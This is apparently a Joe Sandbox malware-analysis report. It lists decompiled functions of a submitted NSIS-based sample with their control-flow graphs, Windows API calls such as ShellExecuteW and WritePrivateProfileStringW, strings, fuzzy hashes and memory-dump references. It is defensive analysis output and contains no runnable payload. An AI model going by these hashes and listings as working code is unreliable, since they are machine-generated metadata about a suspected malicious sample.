                                                                                                                                                                                                                                                                                                          • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                                                                                                                          • API String ID: 4283519449-527102705
                                                                                                                                                                                                                                                                                                          • Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                                                                                                                                                          • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C
                                                                                                                                                                                                                                                                                                          Function 00404F9E Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 714 404f9e-404fb1 715 404fb7-404fca 714->715 716 40506e-405070 714->716 717 404fd5-404fe1 lstrlenW 715->717 718 404fcc-404fd0 call 406831 715->718 720 404fe3-404ff3 lstrlenW 717->720 721 404ffe-405002 717->721 718->717 722 404ff5-404ff9 lstrcatW 720->722 723 40506c-40506d 720->723 724 405011-405015 721->724 725 405004-40500b SetWindowTextW 721->725 722->721 723->716 726 405017-405059 SendMessageW * 3 724->726 727 40505b-40505d 724->727 725->724 726->727 727->723 728 40505f-405064 727->728 728->723
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(00445D80,00426176,756F23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(004034E5,00445D80,00426176,756F23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426176,756F23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                          • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426176,756F23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2740478559-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                                                                                                                                                          • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98
                                                                                                                                                                                                                                                                                                          Function 00401EB9 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 78COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 729 401eb9-401ec4 730 401f24-401f26 729->730 731 401ec6-401ec9 729->731 732 401f53-401f69 GlobalAlloc call 406831 730->732 733 401f28-401f2a 730->733 734 401ed5-401ee3 call 4062cf 731->734 735 401ecb-401ecf 731->735 745 401f6e-401f7b 732->745 736 401f3c-401f4e call 406035 733->736 737 401f2c-401f36 call 4062cf 733->737 747 401ee4-402702 call 406831 734->747 735->731 738 401ed1-401ed3 735->738 751 402387-40238d GlobalFree 736->751 737->736 738->734 742 401ef7-402e50 call 406035 * 3 738->742 750 4030e3-4030f2 742->750 745->750 745->751 762 402708-40270e 747->762 751->750 762->750
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00794950), ref: 00402387
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FreeGloballstrcpyn
                                                                                                                                                                                                                                                                                                          • String ID: Exch: stack < %d elements$PIy$Pop: stack empty$SurplusBallotRhAloneComplexity
                                                                                                                                                                                                                                                                                                          • API String ID: 1459762280-1459020178
                                                                                                                                                                                                                                                                                                          • Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                                                                                                                                                          • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D
                                                                                                                                                                                                                                                                                                          Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 764 402713-40273b call 406035 * 2 769 402746-402749 764->769 770 40273d-402743 call 40145c 764->770 772 402755-402758 769->772 773 40274b-402752 call 40145c 769->773 770->769 776 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 772->776 777 40275a-402761 call 40145c 772->777 773->772 777->776
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          • SurplusBallotRhAloneComplexity, xrefs: 00402770
                                                                                                                                                                                                                                                                                                          • <RM>, xrefs: 00402713
                                                                                                                                                                                                                                                                                                          • WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                                                                                                                                                                          • String ID: <RM>$SurplusBallotRhAloneComplexity$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                                                                                                                                                                                                                                          • API String ID: 247603264-3740103072
                                                                                                                                                                                                                                                                                                          • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                                                                                                                                                          • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD
                                                                                                                                                                                                                                                                                                          Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 785 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 796 402223-4030f2 call 4062cf 785->796 797 40220d-40221b call 4062cf 785->797 797->796
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426176,756F23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426176,756F23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426176,756F23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                          • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                                                                                                                                                                                          • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                                          • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                                                                                                                                                                                          • API String ID: 3156913733-2180253247
                                                                                                                                                                                                                                                                                                          • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                                                                                                                                                          • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138
                                                                                                                                                                                                                                                                                                          Function 00405EAB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 805 405eab-405eb7 806 405eb8-405eec GetTickCount GetTempFileNameW 805->806 807 405efb-405efd 806->807 808 405eee-405ef0 806->808 810 405ef5-405ef8 807->810 808->806 809 405ef2 808->809 809->810
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                                                                                                                                                                                                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                                                                                          • String ID: nsa
                                                                                                                                                                                                                                                                                                          • API String ID: 1716503409-2209301699
                                                                                                                                                                                                                                                                                                          • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                                                                                                                                                          • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98
                                                                                                                                                                                                                                                                                                          Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 811 402175-40218b call 401446 * 2 816 402198-40219d 811->816 817 40218d-402197 call 4062cf 811->817 818 4021aa-4021b0 EnableWindow 816->818 819 40219f-4021a5 ShowWindow 816->819 817->816 821 4030e3-4030f2 818->821 819->821
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                          • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                                                                                                                                                                          • String ID: HideWindow
                                                                                                                                                                                                                                                                                                          • API String ID: 1249568736-780306582
                                                                                                                                                                                                                                                                                                          • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                                                                                                                                                          • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                                                                                                                                                                                                                                                                          Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                                                                                                                                                          • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                                                                                                                                                                                                                                                                          Function 00405E7C Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: File$AttributesCreate
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 415043291-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                                                                                                                                                          • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                                                                                                                                                                                                                                                                          Function 00405E5C Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                                                                                                                                                                                                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
